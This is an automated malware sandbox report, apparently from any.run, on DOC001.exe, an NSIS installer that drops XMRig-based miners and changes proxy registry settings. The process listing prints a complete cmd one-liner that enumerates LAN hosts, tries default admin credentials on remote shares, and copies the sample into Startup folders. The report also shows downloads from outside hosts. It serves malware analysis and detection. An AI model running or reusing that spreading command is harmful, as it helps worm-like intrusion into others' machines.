File name: | DOC001.exe |
Full analysis: | https://app.any.run/tasks/4aac7f04-0251-4a74-8760-dc5cbdc5d43d |
Verdict: | Malicious activity |
Analysis date: | March 26, 2024, 05:37:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
MD5: | C720AC483A5752C2B69945A8AD673162 |
SHA1: | A91BE77FA1BC117C34B3E652706E3B276B487769 |
SHA256: | 856777E16C153722EBD3F389197D4B6482F8AFB2E51345E1AB19760C486C3F78 |
SSDEEP: | 49152:iew+5WyKIQjMo7f6Q7mENkFxdTgO0teiavn0F0w68zdF5vIyPjt+1oPB+mDH9XS6:Xw+0jIQArQqEWn7Iavn0F0w68JF5vI4L |
.exe | | | NSIS - Nullsoft Scriptable Install System (94.8) |
---|---|---|
.exe | | | Win32 Executable MS Visual C++ (generic) (3.4) |
.dll | | | Win32 Dynamic Link Library (generic) (0.7) |
.exe | | | Win32 Executable (generic) (0.5) |
.exe | | | Generic Win/DOS Executable (0.2) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2009:12:05 22:52:12+00:00 |
ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit |
PEType: | PE32 |
LinkerVersion: | 6 |
CodeSize: | 24064 |
InitializedDataSize: | 308224 |
UninitializedDataSize: | 8192 |
EntryPoint: | 0x30fa |
OSVersion: | 4 |
ImageVersion: | 6 |
SubsystemVersion: | 4 |
Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
796 | "C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0* | C:\Windows\System32\cmd.exe | — | DOC001.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
880 | C:\Windows\system32\cmd.exe /c set str_ | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1368 | "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\admin\AppData\Roaming\Tempo\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\admin\AppData\Roaming\Tempo\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) | C:\Windows\System32\cmd.exe | — | DOC001.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1696 | "C:\Users\admin\AppData\Roaming\Tempo\DOC001.exe" | C:\Users\admin\AppData\Roaming\Tempo\DOC001.exe | DOC001.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
1768 | "C:\Users\admin\AppData\Roaming\Tempo\NsCpuCNMiner32.exe" | C:\Users\admin\AppData\Roaming\Tempo\NsCpuCNMiner32.exe | — | DOC001.exe | |||||||||||
User: admin Company: www.xmrig.com Integrity Level: MEDIUM Description: XMRig CPU miner Exit code: 2 Version: 2.8.1 Modules
| |||||||||||||||
2152 | taskkill /f /im NsCpuCNMiner* | C:\Windows\System32\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2260 | C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2388 | find /i "\\" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2592 | net view | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3308 | taskkill /f /im IMG0* | C:\Windows\System32\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (3992) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3992) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3992) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3992) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1696) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (1696) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | delete value | Name: | ProxyServer |
Value: | |||
(PID) Process: | (1696) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | delete value | Name: | ProxyOverride |
Value: | |||
(PID) Process: | (1696) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | delete value | Name: | AutoConfigURL |
Value: | |||
(PID) Process: | (1696) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | delete value | Name: | AutoDetect |
Value: | |||
(PID) Process: | (1696) DOC001.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000005C010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1696 | DOC001.exe | C:\Users\admin\AppData\Local\Temp\nse24E9.tmp\inetc.dll | executable | |
MD5:D7A3FA6A6C738B4A3C40D5602AF20B08 | SHA256:67EFF17C53A78C8EC9A28F392B9BB93DF3E74F96F6ECD87A333A482C36546B3E | |||
1696 | DOC001.exe | C:\Users\admin\AppData\Roaming\Tempo\NsCpuCNMiner32.exe | executable | |
MD5:30843CDD1E1EB312D1CCE94C3C826C88 | SHA256:6EAEBE0831A31D42003811927284CBCE49C0FA10D177F28D139F3F64369C2327 | |||
1696 | DOC001.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | binary | |
MD5:94D05482254FFAAB01B02DDE3DC122DE | SHA256:B0B9BFF2782CCEFBDDBD0726E844F837CC8B49E7BF8D046A900224BCBBA3372B | |||
3992 | DOC001.exe | C:\Users\admin\AppData\Roaming\Tempo\DOC001.exe | executable | |
MD5:C720AC483A5752C2B69945A8AD673162 | SHA256:856777E16C153722EBD3F389197D4B6482F8AFB2E51345E1AB19760C486C3F78 | |||
1696 | DOC001.exe | C:\Users\admin\AppData\Roaming\Tempo\NsCpuCNMiner64.exe | executable | |
MD5:2F4E3381E0CD64B0330D509D6916B940 | SHA256:BE8884FA0BDFF20838A08A9A70331E438ADFC36336C643B2128FFD978E92540F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1696 | DOC001.exe | GET | 404 | 185.26.112.217:80 | http://rucop.ru/java.dat | unknown | text | 160 b | — |
1696 | DOC001.exe | GET | 404 | 185.26.112.217:80 | http://rucop.ru/tess8.html | unknown | text | 160 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | unknown |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1696 | DOC001.exe | 185.26.112.217:80 | rucop.ru | Jsc ru-center | RU | unknown |
1696 | DOC001.exe | 49.13.77.253:80 | kriso.ru | Hetzner Online GmbH | DE | unknown |
Domain | IP | Reputation |
---|---|---|
rucop.ru |
| unknown |
kriso.ru |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) |
— | — | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) |